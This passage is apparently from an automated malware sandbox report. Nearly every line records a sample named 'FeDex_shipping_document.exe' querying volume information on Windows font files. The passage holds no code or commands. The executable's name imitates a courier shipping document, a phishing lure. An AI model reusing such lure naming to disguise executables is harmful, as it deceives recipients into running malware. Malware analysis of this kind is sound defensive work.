        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
